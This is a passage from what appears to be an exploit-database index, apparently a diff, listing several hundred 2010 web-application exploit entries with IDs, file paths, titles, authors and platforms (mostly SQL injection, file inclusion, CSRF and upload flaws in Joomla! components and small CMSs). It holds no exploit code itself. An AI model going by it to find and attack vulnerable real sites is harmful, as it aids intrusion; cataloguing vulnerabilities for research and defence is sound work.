+11226,exploits/php/webapps/11226.txt,"Joomla! Component com_biographies - SQL Injection",2010-01-22,snakespc,webapps,php, +11235,exploits/php/webapps/11235.txt,"magic-portal 2.1 - SQL Injection",2010-01-23,alnjm33,webapps,php, +11236,exploits/php/webapps/11236.txt,"Joomla! Component com_ContentBlogList - SQL Injection",2010-01-23,B-HUNT3|2,webapps,php, +11237,exploits/php/webapps/11237.txt,"Joomla! Component com_casino - SQL Injection",2010-01-23,B-HUNT3|2,webapps,php, +11238,exploits/php/webapps/11238.txt,"Joomla! Component com_jbpublishdownfp - SQL Injection",2010-01-23,B-HUNT3|2,webapps,php, +11239,exploits/php/webapps/11239.txt,"Joomla! Component JBDiary - Blind SQL Injection",2010-01-23,B-HUNT3|2,webapps,php, +11240,exploits/php/webapps/11240.txt,"OpenDb 1.5.0.4 - Multiple Local File Inclusions",2010-01-23,ViRuSMaN,webapps,php, +11243,exploits/windows/webapps/11243.txt,"Joomla! Component com_mochigames - SQL Injection",2010-01-24,B-HUNT3|2,webapps,windows, +11244,exploits/php/webapps/11244.txt,"Silverstripe 2.3.5 - Cross-Site Request Forgery / Open redirection",2010-01-24,cp77fk4r,webapps,php, +11249,exploits/php/webapps/11249.txt,"BoastMachine 3.1 - Arbitrary File Upload",2010-01-24,alnjm33,webapps,php, +11258,exploits/php/webapps/11258.html,"Status2k - Remote Add Admin",2010-01-25,alnjm33,webapps,php, +11261,exploits/php/webapps/11261.txt,"UGiA PHP UPLOADER 0.2 - Arbitrary File Upload",2010-01-26,indoushka,webapps,php, +11262,exploits/php/webapps/11262.php,"Joomla! 1.5.12 - Connect Back",2010-01-26,"Nikola Petrov",webapps,php, +11263,exploits/php/webapps/11263.php,"Joomla! 1.5.12 - read/exec Remote files",2010-01-26,"Nikoal Petrov",webapps,php, +11270,exploits/php/webapps/11270.txt,"Joomla! Component VirtueMart Module Customers_who_bought - SQL Injection",2010-01-27,B-HUNT3|2,webapps,php, +11271,exploits/php/webapps/11271.txt,"Joomla! Component com_virtuemart - order_status_id SQL Injection",2010-01-27,B-HUNT3|2,webapps,php, +11274,exploits/php/webapps/11274.pl,"Woltlab Burningboard Addon Kleinanzeigenmarkt - SQL Injection",2009-12-21,fred777,webapps,php, +11277,exploits/php/webapps/11277.txt,"Joomla! Component CCNewsLetter - Directory Traversal",2010-01-28,B-HUNT3|2,webapps,php, +11278,exploits/php/webapps/11278.txt,"Novaboard 1.1.2 - SQL Injection",2010-01-28,Delibey,webapps,php, +11279,exploits/php/webapps/11279.txt,"Joomla! Component com_kunena - Blind SQL Injection",2010-01-28,B-HUNT3|2,webapps,php, +11280,exploits/php/webapps/11280.txt,"Joomla! Component jVideoDirect - Blind SQL Injection",2010-01-28,B-HUNT3|2,webapps,php, +11282,exploits/php/webapps/11282.txt,"Joomla! Component CCNewsLetter - Local File Inclusion",2010-01-28,AtT4CKxT3rR0r1ST,webapps,php, +11284,exploits/php/webapps/11284.txt,"PHP Product Catalog - Cross-Site Request Forgery (Change Administrator Password)",2010-01-29,bi0,webapps,php, +11286,exploits/php/webapps/11286.txt,"Joomla! Component Jreservation - Blind SQL Injection",2010-01-29,B-HUNT3|2,webapps,php, +11287,exploits/php/webapps/11287.txt,"Joomla! Component JE Quiz - 'eid' Blind SQL Injection",2010-01-29,B-HUNT3|2,webapps,php, +11289,exploits/php/webapps/11289.txt,"Joomla! Component com_dms 2.5.1 - SQL Injection",2010-01-30,kaMtiEz,webapps,php, +11290,exploits/php/webapps/11290.txt,"phpunity.newsmanager - Local File Inclusion",2010-01-30,kaMtiEz,webapps,php, +11292,exploits/php/webapps/11292.txt,"Joomla! Component JE Event Calendar - SQL Injection",2010-01-30,B-HUNT3|2,webapps,php, +11294,exploits/php/webapps/11294.txt,"Joomla! Component com_simplefaq - 'catid' Blind SQL Injection",2010-01-30,AtT4CKxT3rR0r1ST,webapps,php, +11295,exploits/asp/webapps/11295.txt,"eWebeditor ASP Version - Multiple Vulnerabilities",2010-01-29,anonymous,webapps,asp, +11296,exploits/php/webapps/11296.txt,"ThinkAdmin - 'page.php' SQL Injection",2010-01-30,AtT4CKxT3rR0r1ST,webapps,php, +11297,exploits/php/webapps/11297.txt,"IPB (nv2) Awards < 1.1.0 - SQL Injection (PoC)",2010-01-30,fred777,webapps,php, +11298,exploits/php/webapps/11298.txt,"dotProject 2.1.3 - Cross-Site Scripting / Improper Permissions",2010-01-30,h00die,webapps,php,80 +11299,exploits/php/webapps/11299.txt,"crownweb - 'page.cfm' SQL Injection",2010-01-31,AtT4CKxT3rR0r1ST,webapps,php, +11300,exploits/php/webapps/11300.txt,"Creative SplashWorks-SplashSite - 'page.php' Blind SQL Injection",2010-01-31,AtT4CKxT3rR0r1ST,webapps,php, +11301,exploits/php/webapps/11301.txt,"Maian Greetings 2.1 - Arbitrary File Upload",2010-01-31,indoushka,webapps,php, +11303,exploits/php/webapps/11303.txt,"Saman Portal - SQL Injection",2010-01-31,"Pouya Daneshmand",webapps,php, +11305,exploits/php/webapps/11305.txt,"ShoutCMS - 'content.php' Blind SQL Injection",2010-02-01,"Zero Cold",webapps,php, +11306,exploits/php/webapps/11306.txt,"Evernew Free Joke Script - 'viewjokes.php' SQL Injection",2010-02-01,"Hamza 'MizoZ' N.",webapps,php, +11307,exploits/php/webapps/11307.txt,"Joomla! Component Job - SQL Injection",2010-02-01,B-HUNT3|2,webapps,php, +11308,exploits/php/webapps/11308.txt,"Joomla! Component Yelp - SQL Injection",2010-02-01,B-HUNT3|2,webapps,php, +11309,exploits/php/webapps/11309.txt,"Snif 1.5.2 - Any Filetype Download",2010-02-01,Aodrulez,webapps,php, +11310,exploits/asp/webapps/11310.txt,"RaakCMS - Multiple Vulnerabilities",2010-02-01,"Pouya Daneshmand",webapps,asp, +11311,exploits/php/webapps/11311.txt,"Home Of AlegroCart 1.1 - Cross-Site Request Forgery (Change Administrator Password)",2010-02-01,The.Morpheus,webapps,php, +11316,exploits/php/webapps/11316.txt,"GCP 2.0 datasets provided as BioCASE Web services - Local File Inclusion",2010-02-02,R3VAN_BASTARD,webapps,php, +11318,exploits/php/webapps/11318.txt,"Dlili Script - SQL Injection",2010-02-02,Dr.DaShEr,webapps,php, +11319,exploits/php/webapps/11319.txt,"MYRE Classified - 'cat' SQL Injection",2010-02-02,kaMtiEz,webapps,php, +11321,exploits/php/webapps/11321.txt,"MobPartner Chat - Multiple SQL Injections",2010-02-02,AtT4CKxT3rR0r1ST,webapps,php, +11322,exploits/php/webapps/11322.txt,"KubeLance 1.7.6 - Cross-Site Request Forgery (Add Admin)",2010-02-03,"Milos Zivanovic",webapps,php, +11323,exploits/php/webapps/11323.txt,"PHP Car Rental-Script - Authentication Bypass",2010-02-03,"Hamza 'MizoZ' N.",webapps,php, +11324,exploits/jsp/webapps/11324.txt,"Hipergate 4.0.12 - Multiple Vulnerabilities",2010-02-03,"Nahuel Grisolia",webapps,jsp, +11325,exploits/php/webapps/11325.txt,"RealAdmin - 'detail.php' Blind SQL Injection",2010-02-03,AtT4CKxT3rR0r1ST,webapps,php, +11326,exploits/php/webapps/11326.txt,"cityadmin - 'links.php' Blind SQL Injection",2010-02-03,AtT4CKxT3rR0r1ST,webapps,php, +11327,exploits/php/webapps/11327.txt,"myBusinessAdmin - 'content.php' Blind SQL Injection",2010-02-03,AtT4CKxT3rR0r1ST,webapps,php, +11329,exploits/php/webapps/11329.txt,"MASA2EL Music City 1.0 - SQL Injection",2010-02-04,alnjm33,webapps,php, +11330,exploits/windows/webapps/11330.txt,"ManageEngine OpUtils 5 - 'Login.DO' SQL Injection",2010-02-04,"Asheesh Anaconda",webapps,windows, +11334,exploits/php/webapps/11334.txt,"Audistats 1.3 - SQL Injection",2010-02-05,kaMtiEz,webapps,php, +11336,exploits/php/webapps/11336.txt,"Open Bulletin Board - Multiple Blind SQL Injections",2010-02-06,AtT4CKxT3rR0r1ST,webapps,php, +11337,exploits/php/webapps/11337.txt,"Joomla! Component com_photoblog - Blind SQL Injection",2010-02-06,ALTBTA,webapps,php, +11339,exploits/php/webapps/11339.txt,"Arab Network Tech. (ANT) CMS - SQL Injection",2010-02-06,Tr0y-x,webapps,php, +11340,exploits/php/webapps/11340.txt,"odlican.net CMS 1.5 - Arbitrary File Upload",2010-02-06,anonymous,webapps,php, +11341,exploits/php/webapps/11341.txt,"ShopEx Single 4.5.1 - Multiple Vulnerabilities",2010-02-06,cp77fk4r,webapps,php, +11344,exploits/php/webapps/11344.txt,"WSN Guest - Database Disclosure",2010-02-07,HackXBack,webapps,php, +11345,exploits/php/webapps/11345.txt,"Zen Tracking 2.2 - Authentication Bypass",2010-02-07,cr4wl3r,webapps,php, +11346,exploits/php/webapps/11346.txt,"Baal Systems 3.8 - Authentication Bypass",2010-02-07,cr4wl3r,webapps,php, +11348,exploits/asp/webapps/11348.txt,"DA Mailing List System 2 - Multiple Vulnerabilities",2010-02-07,Phenom,webapps,asp, +11349,exploits/php/webapps/11349.txt,"Exponent CMS 0.96.3 - 'articlemodule' SQL Injection",2010-02-07,"T u R c O",webapps,php, +11350,exploits/php/webapps/11350.txt,"Belkatalog CMS - SQL Injection",2010-02-07,anonymous,webapps,php, +11352,exploits/php/webapps/11352.txt,"Joomla! Component com_productbook - SQL Injection",2010-02-07,snakespc,webapps,php, +11353,exploits/php/webapps/11353.txt,"Croogo 1.2.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-02-07,"Milos Zivanovic",webapps,php, +11354,exploits/php/webapps/11354.txt,"Killmonster 2.1 - Authentication Bypass",2010-02-07,cr4wl3r,webapps,php, +11355,exploits/php/webapps/11355.txt,"EncapsCMS 0.3.6 - 'config[path]' Remote File Inclusion",2010-02-07,cr4wl3r,webapps,php, +11356,exploits/php/webapps/11356.txt,"Rostermain 1.1 - Authentication Bypass",2010-02-07,cr4wl3r,webapps,php, +11357,exploits/php/webapps/11357.txt,"Uiga Business Portal - SQL Injection / Cross-Site Scripting",2010-02-07,"Sioma Labs",webapps,php, +11358,exploits/php/webapps/11358.txt,"TinyMCE WYSIWYG Editor - Multiple Vulnerabilities",2010-02-07,mc2_s3lector,webapps,php, +11359,exploits/php/webapps/11359.txt,"JaxCMS 1.0 - Local File Inclusion",2010-02-08,"Hamza 'MizoZ' N.",webapps,php, +11360,exploits/php/webapps/11360.txt,"Blue Dove - SQL Injection",2010-02-08,HackXBack,webapps,php, +11361,exploits/asp/webapps/11361.txt,"fipsForum 2.6 - Remote Database Disclosure",2010-02-09,ViRuSMaN,webapps,asp, +11365,exploits/php/webapps/11365.txt,"CPA Site Solutions - Arbitrary File Upload",2010-02-09,R3VAN_BASTARD,webapps,php, +11366,exploits/php/webapps/11366.txt,"NewsLetter Tailor - Database Backup Dump",2010-02-09,ViRuSMaN,webapps,php, +11367,exploits/php/webapps/11367.txt,"NewsLetter Tailor - Authentication Bypass",2010-02-09,ViRuSMaN,webapps,php, +11368,exploits/php/webapps/11368.txt,"Yes Solutions - Webapp SQL Injection",2010-02-09,HackXBack,webapps,php, +11369,exploits/asp/webapps/11369.txt,"MOJO's IWms 7 - SQL Injection / Cross-Site Scripting",2010-02-09,cp77fk4r,webapps,asp, +11375,exploits/php/webapps/11375.txt,"Zomorrod CMS - SQL Injection",2010-02-09,"Pouya Daneshmand",webapps,php, +11376,exploits/php/webapps/11376.txt,"Fonts Site Script - Remote File Disclosure",2010-02-09,JIKO,webapps,php, +11377,exploits/php/webapps/11377.txt,"Limny 1.01 - Arbitrary File Upload",2010-02-09,JIKO,webapps,php, +11378,exploits/php/webapps/11378.txt,"NewsLetter Tailor 0.2.0 - Remote File Inclusion",2010-02-09,snakespc,webapps,php, +11380,exploits/php/webapps/11380.txt,"osTicket 1.6 RC5 - Multiple Vulnerabilities",2010-02-09,"Nahuel Grisolia",webapps,php, +11382,exploits/php/webapps/11382.txt,"eSmile Script - 'index.php' SQL Injection",2010-02-10,AtT4CKxT3rR0r1ST,webapps,php, +11383,exploits/php/webapps/11383.txt,"HASHE! Solutions - Multiple SQL Injections",2010-02-10,AtT4CKxT3rR0r1ST,webapps,php, +11385,exploits/php/webapps/11385.txt,"ULoki Community Forum 2.1 - 'usercp.php' Cross-Site Scripting",2010-02-10,"Sioma Labs",webapps,php, +11393,exploits/jsp/webapps/11393.txt,"Omnidocs - SQL Injection",2010-02-11,thebluegenius,webapps,jsp, +11394,exploits/php/webapps/11394.txt,"vBulletin 3.5.2 - Cross-Site Scripting",2010-02-11,ROOT_EGY,webapps,php, +11395,exploits/php/webapps/11395.txt,"vBulletin 3.0.0 - Cross-Site Scripting",2010-02-11,ROOT_EGY,webapps,php, +11396,exploits/php/webapps/11396.txt,"vBulletin 2.3.x - SQL Injection",2010-02-11,ROOT_EGY,webapps,php, +11398,exploits/php/webapps/11398.txt,"GameRoom Script - Authentication Bypass / Arbitrary File Upload",2010-02-11,JIKO,webapps,php, +11399,exploits/php/webapps/11399.txt,"myPHP Guestbook 2.0.4 - Database Backup Dump",2010-02-11,ViRuSMaN,webapps,php, +11401,exploits/php/webapps/11401.txt,"CD Rentals Script - SQL Injection",2010-02-11,"Don Tukulesto",webapps,php, +11402,exploits/php/webapps/11402.txt,"Books/eBooks Rental Software - SQL Injection",2010-02-11,"Don Tukulesto",webapps,php, +11403,exploits/multiple/webapps/11403.txt,"Cisco Collaboration Server 5 - Cross-Site Scripting / Source Code Disclosure",2010-02-11,s4squatch,webapps,multiple,80 +11404,exploits/multiple/webapps/11404.txt,"X-Cart Pro 4.0.13 - SQL Injection (PoC)",2010-02-11,s4squatch,webapps,multiple,80 +11405,exploits/multiple/webapps/11405.txt,"RSA - SecurID Cross-Site Scripting",2010-02-11,s4squatch,webapps,multiple,80 +11406,exploits/windows/webapps/11406.txt,"J.A.G (Just Another Guestbook) 1.14 - Database Disclosure",2010-02-11,Phenom,webapps,windows,80 +11409,exploits/multiple/webapps/11409.txt,"Video Games Rentals Script - SQL Injection",2010-02-11,JaMbA,webapps,multiple,80 +11410,exploits/php/webapps/11410.txt,"Vacation Rental Script - SQL Injection",2010-02-11,JaMbA,webapps,php, +11411,exploits/php/webapps/11411.txt,"apemCMS - SQL Injection",2010-02-11,Ariko-Security,webapps,php, +11412,exploits/php/webapps/11412.txt,"Trade Manager Script - SQL Injection",2010-02-11,JaMbA,webapps,php, +11414,exploits/asp/webapps/11414.txt,"Infragistics WebHtmlEditor 7.1 - Multiple Vulnerabilities",2010-02-12,SpeeDr00t,webapps,asp, +11415,exploits/php/webapps/11415.txt,"Izumi 1.1.0 - Multiple Local File Inclusion / Remote File Inclusions",2010-02-12,cr4wl3r,webapps,php, +11416,exploits/php/webapps/11416.txt,"Alqatari Group 1.0 - Blind SQL Injection",2010-02-12,Red-D3v1L,webapps,php, +11424,exploits/php/webapps/11424.txt,"CMS Made Simple 1.6.6 - Multiple Vulnerabilities",2010-02-12,"Beenu Arora",webapps,php, +11425,exploits/php/webapps/11425.txt,"daChooch - SQL Injection",2010-02-12,snakespc,webapps,php, +11429,exploits/php/webapps/11429.txt,"Vito CMS - SQL Injection",2010-02-13,hacker@sr.gov.yu,webapps,php, +11430,exploits/php/webapps/11430.txt,"southburn Web - 'products.php' SQL Injection",2010-02-13,AtT4CKxT3rR0r1ST,webapps,php, +11431,exploits/php/webapps/11431.txt,"MRW PHP Upload - Arbitrary File Upload",2010-02-13,Phenom,webapps,php, +11434,exploits/php/webapps/11434.txt,"statcountex 3.1 - Multiple Vulnerabilities",2010-02-13,Phenom,webapps,php, +11436,exploits/php/webapps/11436.txt,"WSN Guest 1.02 - 'orderlinks' SQL Injection",2010-02-13,Gamoscu,webapps,php, +11437,exploits/php/webapps/11437.txt,"ZeusCMS 0.2 - Database Backup Dump / Local File Inclusion",2010-02-13,ViRuSMaN,webapps,php, +11440,exploits/php/webapps/11440.txt,"InterTech Co 1.0 - SQL Injection",2010-02-13,Red-D3v1L,webapps,php, +11441,exploits/php/webapps/11441.txt,"WordPress 2.9 - Failure to Restrict URL Access",2010-02-13,tmacuk,webapps,php, +11442,exploits/php/webapps/11442.txt,"PHP PEAR 1.9.0 - Multiple Remote File Inclusions",2010-02-14,eidelweiss,webapps,php, +11443,exploits/php/webapps/11443.txt,"Calendarix 0.8.20071118 - SQL Injection",2010-02-14,Thibow,webapps,php, +11444,exploits/php/webapps/11444.txt,"ShortCMS 1.2.0 - SQL Injection",2010-02-14,Thibow,webapps,php, +11445,exploits/php/webapps/11445.txt,"JTL-Shop 2 - 'druckansicht.php' SQL Injection",2010-02-14,Lo$T,webapps,php, +11446,exploits/php/webapps/11446.txt,"Mambo Component AkoGallery - SQL Injection",2010-02-14,snakespc,webapps,php, +11447,exploits/php/webapps/11447.txt,"Joomla! Component Jw_allVideos - Arbitrary File Download",2010-02-14,"Pouya Daneshmand",webapps,php, +11449,exploits/php/webapps/11449.txt,"Joomla! Component com_videos - SQL Injection",2010-02-14,snakespc,webapps,php, +11450,exploits/php/webapps/11450.txt,"File Upload Manager 1.3 - Web Shell File Upload",2010-02-14,ROOT_EGY,webapps,php, +11452,exploits/php/webapps/11452.txt,"Katalog Stron Hurricane 1.3.5 - Remote File Inclusion / SQL Injection",2010-02-14,kaMtiEz,webapps,php, +11455,exploits/php/webapps/11455.txt,"Généré par KDPics 1.18 - Remote Add Admin",2010-02-15,snakespc,webapps,php, +11456,exploits/php/webapps/11456.txt,"superengine CMS (Custom Pack) - SQL Injection",2010-02-15,10n1z3d,webapps,php, +11458,exploits/php/webapps/11458.txt,"WordPress Plugin Copperleaf Photolog 0.16 - SQL Injection",2010-02-15,kaMtiEz,webapps,php, +11460,exploits/php/webapps/11460.txt,"Dodo Upload 1.3 - Arbitrary File Upload (Bypass)",2010-02-15,indoushka,webapps,php, +11461,exploits/php/webapps/11461.txt,"CoffieNet CMS - Admin Bypass",2010-02-15,indoushka,webapps,php, +11462,exploits/php/webapps/11462.txt,"blog ink - Bypass Setting",2010-02-15,indoushka,webapps,php, +11463,exploits/php/webapps/11463.txt,"Joomla! Component com_joomportfolio - Blind Injection",2010-02-15,snakespc,webapps,php, +11464,exploits/php/webapps/11464.txt,"Joomla! Component com_hdvideoshare - SQL Injection",2010-02-15,snakespc,webapps,php, +11466,exploits/php/webapps/11466.txt,"microUpload - Arbitrary File Upload",2010-02-15,Phenom,webapps,php, +11473,exploits/php/webapps/11473.txt,"Pogodny CMS - SQL Injection",2010-02-16,Ariko-Security,webapps,php, +11474,exploits/php/webapps/11474.txt,"Mambo Component 'com_acnews' - 'id' SQL Injection",2010-02-16,"Zero Bits & Xzit3",webapps,php, +11476,exploits/php/webapps/11476.txt,"SongForever.com Clone - Arbitrary File Upload",2010-02-16,indoushka,webapps,php, +11477,exploits/php/webapps/11477.txt,"Limny 2.0 - Cross-Site Request Forgery (Change Email and Password)",2010-02-16,"Luis Santana",webapps,php, +11478,exploits/php/webapps/11478.txt,"Limny 2.0 - Cross-Site Request Forgery (Create Admin User)",2010-02-16,"Luis Santana",webapps,php, +11479,exploits/php/webapps/11479.txt,"Joomla! Component com_acstartseite - SQL Injection",2010-02-17,AtT4CKxT3rR0r1ST,webapps,php, +11480,exploits/php/webapps/11480.txt,"Joomla! Component com_acprojects - SQL Injection",2010-02-17,AtT4CKxT3rR0r1ST,webapps,php, +11481,exploits/php/webapps/11481.txt,"intuitive - 'form.php' SQL Injection",2010-02-17,AtT4CKxT3rR0r1ST,webapps,php, +11482,exploits/php/webapps/11482.txt,"Nabernet - 'articles.php' SQL Injection",2010-02-17,AtT4CKxT3rR0r1ST,webapps,php, +11483,exploits/php/webapps/11483.txt,"Joomla! Component com_acteammember - SQL Injection",2010-02-17,ALTBTA,webapps,php, +11484,exploits/php/webapps/11484.txt,"uGround 1.0b - SQL Injection",2010-02-17,"Easy Laster",webapps,php, +11485,exploits/php/webapps/11485.txt,"Multiple File Attachments Mail Form Pro 2.0 - Arbitrary File Upload",2010-02-17,EgoPL,webapps,php, +11486,exploits/php/webapps/11486.txt,"PHPIDS 0.4 - Remote File Inclusion",2010-02-17,eidelweiss,webapps,php, +11487,exploits/php/webapps/11487.txt,"Auktionshaus 4 - 'news.php' SQL Injection",2010-02-17,"Easy Laster",webapps,php, +11488,exploits/php/webapps/11488.txt,"Auktionshaus Gelb 3 - 'news.php' SQL Injection",2010-02-17,"Easy Laster",webapps,php, +11489,exploits/php/webapps/11489.txt,"Erotik Auktionshaus - 'news.php' SQL Injection",2010-02-17,"Easy Laster",webapps,php, +11490,exploits/php/webapps/11490.txt,"PunBBAnnuaire 0.4 - Blind SQL Injection",2010-02-17,Metropolis,webapps,php, +11494,exploits/php/webapps/11494.txt,"Joomla! Component com_otzivi - Local File Inclusion",2010-02-18,AtT4CKxT3rR0r1ST,webapps,php, +11495,exploits/php/webapps/11495.txt,"CubeCart - 'index.php' SQL Injection",2010-02-18,AtT4CKxT3rR0r1ST,webapps,php, +11496,exploits/php/webapps/11496.txt,"Open Source Classifieds 1.1.0 Alpha (OSClassi) - SQL Injection / Cross-Site Scripting / Arbitrary Admin Change",2010-02-18,"Sioma Labs",webapps,php, +11498,exploits/php/webapps/11498.txt,"Joomla! Plugin Core Design Scriptegrator - Local File Inclusion",2010-02-18,"S2 Crew",webapps,php, +11502,exploits/php/webapps/11502.txt,"phpAutoVideo - Cross-Site Request Forgery",2010-02-19,GoLdeN-z3r0,webapps,php, +11503,exploits/php/webapps/11503.txt,"Litespeed Web Server 4.0.12 - Cross-Site Request Forgery (Add Admin) / Cross-Site Scripting",2010-02-19,d1dn0t,webapps,php, +11504,exploits/php/webapps/11504.txt,"Amelia CMS - SQL Injection",2010-02-19,Ariko-Security,webapps,php, +11507,exploits/php/webapps/11507.txt,"WSC CMS - Authentication Bypass",2010-02-19,Phenom,webapps,php, +11508,exploits/php/webapps/11508.txt,"Fonality trixbox 2.2.4 - 'PhonecDirectory.php' SQL Injection",2010-02-19,NorSlacker,webapps,php, +11509,exploits/php/webapps/11509.txt,"PHPKit 1.6.1 - 'mailer.php' SQL Injection",2010-02-19,"Easy Laster",webapps,php, +11511,exploits/php/webapps/11511.txt,"Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion",2010-02-19,kaMtiEz,webapps,php, +11515,exploits/php/webapps/11515.txt,"FlatFile Login System - Remote Password Disclosure",2010-02-20,ViRuSMaN,webapps,php, +11516,exploits/php/webapps/11516.html,"TimeClock 0.99 - Cross-Site Request Forgery (Add Admin)",2010-02-20,ViRuSMaN,webapps,php, +11517,exploits/php/webapps/11517.txt,"Netzbrett - Database Disclosure",2010-02-20,ViRuSMaN,webapps,php, +11518,exploits/php/webapps/11518.txt,"Softbiz Jobs - 'news_desc' SQL Injection",2010-02-22,BAYBORA,webapps,php, +11519,exploits/php/webapps/11519.txt,"Ac4p.com Gallery 1.0 - Multiple Vulnerabilities",2010-02-22,indoushka,webapps,php, +11521,exploits/php/webapps/11521.txt,"Ero Auktion 2.0 - 'news.php' SQL Injection",2010-02-22,"Easy Laster",webapps,php, +11522,exploits/php/webapps/11522.txt,"Ero Auktion 2010 - 'news.php' SQL Injection",2010-02-22,"Easy Laster",webapps,php, +11523,exploits/php/webapps/11523.txt,"Galerie Dezign-Box France - Multiple Vulnerabilities",2010-02-22,indoushka,webapps,php, +11524,exploits/php/webapps/11524.txt,"Arab Cart 1.0.2.0 - Multiple Vulnerabilities",2010-02-22,indoushka,webapps,php, +11526,exploits/php/webapps/11526.txt,"vBSEO 3.1.0 - Local File Inclusion",2010-02-22,ViRuSMaN,webapps,php, +11527,exploits/multiple/webapps/11527.html,"cPanel - Multiple Cross-Site Request Forgery Vulnerabilities",2010-02-22,SecurityRules,webapps,multiple, +11528,exploits/php/webapps/11528.txt,"phpBugTracker 1.0.1 - File Disclosure",2010-02-22,ViRuSMaN,webapps,php, +11530,exploits/php/webapps/11530.txt,"Article Friendly - SQL Injection",2010-02-22,SkuLL-HackeR,webapps,php, +11543,exploits/php/webapps/11543.txt,"Softbiz Jobs - Cross-Site Request Forgery",2010-02-23,"pratul agrawal",webapps,php, +11544,exploits/php/webapps/11544.php,"Joomla! Component com_ice - Blind SQL Injection",2010-02-23,snakespc,webapps,php, +11547,exploits/php/webapps/11547.txt,"PHP Auktion Pro SQL - 'news.php' SQL Injection",2010-02-23,"Easy Laster",webapps,php, +11548,exploits/php/webapps/11548.txt,"Top Auktion - 'news.php' SQL Injection",2010-02-23,"Easy Laster",webapps,php, +11549,exploits/php/webapps/11549.pl,"Joomla! Component user_id com_sqlreport - Blind SQL Injection",2010-02-23,snakespc,webapps,php, +11550,exploits/php/webapps/11550.txt,"WorkSimple 1.3.2 - Multiple Vulnerabilities",2010-02-23,JIKO,webapps,php, +11551,exploits/php/webapps/11551.txt,"Softbiz Jobs - Multiple SQL Injections",2010-02-23,"Easy Laster",webapps,php, +11553,exploits/php/webapps/11553.txt,"Tinypug 0.9.5 - Cross-Site Request Forgery (Password Change)",2010-02-23,AmnPardaz,webapps,php, +11554,exploits/php/webapps/11554.txt,"QuickDev 4 PHP - Database Disclosure",2010-02-23,ViRuSMaN,webapps,php, +11555,exploits/asp/webapps/11555.txt,"bispage - Bypass",2010-02-23,SaMir-BonD,webapps,asp, +11557,exploits/php/webapps/11557.txt,"Max's Photo Album - Arbitrary File Upload",2010-02-24,indoushka,webapps,php, +11558,exploits/php/webapps/11558.txt,"MySmartBB 1.0.0 - Cross-Site Scripting",2010-02-24,indoushka,webapps,php, +11559,exploits/php/webapps/11559.txt,"Article Friendly - Cross-Site Request Forgery",2010-02-24,"pratul agrawal",webapps,php, +11560,exploits/php/webapps/11560.txt,"WikyBlog 1.7.3rc2 - Multiple Vulnerabilities",2010-02-24,indoushka,webapps,php, +11563,exploits/php/webapps/11563.txt,"kalimat new system 1.0 - 'index.php' SQL Injection",2009-11-16,ProF.Code,webapps,php, +11564,exploits/php/webapps/11564.txt,"ShortCMS 1.11F(B) (con) - SQL Injection",2010-02-24,Gamoscu,webapps,php, +11565,exploits/php/webapps/11565.txt,"PHPCOIN 1.2.1 - 'mod.php' SQL Injection",2010-02-24,BAYBORA,webapps,php, +11568,exploits/php/webapps/11568.txt,"Softbiz Auktios Script - Multiple SQL Injections",2010-02-24,"Easy Laster",webapps,php, +11569,exploits/php/webapps/11569.txt,"Web Server Creator Web Portal 0.1 - Multiple Vulnerabilities",2010-02-24,indoushka,webapps,php, +11570,exploits/php/webapps/11570.txt,"PBBoard 2.0.5 - Multiple Vulnerabilities",2010-02-24,indoushka,webapps,php, +11571,exploits/php/webapps/11571.txt,"Maian Uploader 4.0 - Arbitrary File Upload",2010-02-24,indoushka,webapps,php, +11575,exploits/php/webapps/11575.txt,"Softbiz Classifieds PLUS - Multiple SQL Injections",2010-02-24,"Easy Laster",webapps,php, +11576,exploits/php/webapps/11576.txt,"Softbiz Recipes Portal Script - 'showcats.php' SQL Injection",2010-02-25,"Easy Laster",webapps,php, +11577,exploits/php/webapps/11577.txt,"GameScript 3.0 - SQL Injection",2010-02-25,FormatXformat,webapps,php, +11578,exploits/php/webapps/11578.php,"Joomla! Component com_Joomlaconnect_be - Blind Injection",2010-02-25,snakespc,webapps,php, +11579,exploits/php/webapps/11579.txt,"WebAdministrator Lite CMS - SQL Injection",2010-02-25,Ariko-Security,webapps,php, +11580,exploits/aix/webapps/11580.txt,"FileExecutive 1 - Multiple Vulnerabilities",2010-02-26,ViRuSMaN,webapps,aix, +11582,exploits/php/webapps/11582.txt,"DZ Erotik Auktionshaus 4.rgo - 'news.php' SQL Injection",2010-02-27,"Easy Laster",webapps,php, +11583,exploits/php/webapps/11583.pl,"Gravity Board X 2.0 Beta (Public Release 3) - SQL Injection",2010-02-27,Ctacok,webapps,php, +11584,exploits/php/webapps/11584.txt,"Project Man 1.0 - Authentication Bypass",2010-02-27,cr4wl3r,webapps,php, +11585,exploits/php/webapps/11585.txt,"phpCDB 1.0 - Local File Inclusion",2010-02-27,cr4wl3r,webapps,php, +11586,exploits/php/webapps/11586.txt,"phpRAINCHECK 1.0.1 - SQL Injection",2010-02-27,cr4wl3r,webapps,php, +11587,exploits/php/webapps/11587.txt,"ProMan 0.1.1 - Multiple File Inclusions",2010-02-27,cr4wl3r,webapps,php, +11588,exploits/php/webapps/11588.txt,"phpMySite - Cross-Site Scripting / SQL Injection",2010-02-27,Crux,webapps,php, +11589,exploits/asp/webapps/11589.txt,"Pre Classified Listings - SQL Injection",2010-02-27,Crux,webapps,asp, +11592,exploits/php/webapps/11592.txt,"Scripts Feed Business Directory - SQL Injection",2010-02-27,Crux,webapps,php, +11593,exploits/php/webapps/11593.txt,"Uiga Fan Club 1.0 - Authentication Bypass",2010-02-27,cr4wl3r,webapps,php, +11595,exploits/php/webapps/11595.php,"Joomla! Component com_paxgallery - Blind Injection",2010-02-27,snakespc,webapps,php, +11596,exploits/php/webapps/11596.txt,"Slaed CMS 4.0 - Multiple Vulnerabilities",2010-02-27,indoushka,webapps,php, +11599,exploits/php/webapps/11599.txt,"Uiga Personal Portal - 'index.php' SQL Injection",2010-02-28,"Easy Laster",webapps,php, +11600,exploits/php/webapps/11600.txt,"Uiga Fan Club - 'index.php' SQL Injection",2010-02-28,"Easy Laster",webapps,php, +11602,exploits/php/webapps/11602.txt,"HazelPress Lite 0.0.4 - Authentication Bypass",2010-02-28,cr4wl3r,webapps,php, +11603,exploits/php/webapps/11603.txt,"Joomla! Component com_yanc - SQL Injection",2010-02-28,snakespc,webapps,php, +11604,exploits/php/webapps/11604.php,"Joomla! Component com_liveticker - Blind SQL Injection",2010-02-28,snakespc,webapps,php, +11605,exploits/php/webapps/11605.txt,"Baykus Yemek Tarifleri 2.1 - SQL Injection",2010-02-28,cr4wl3r,webapps,php, +11606,exploits/asp/webapps/11606.txt,"Majoda CMS - Authentication 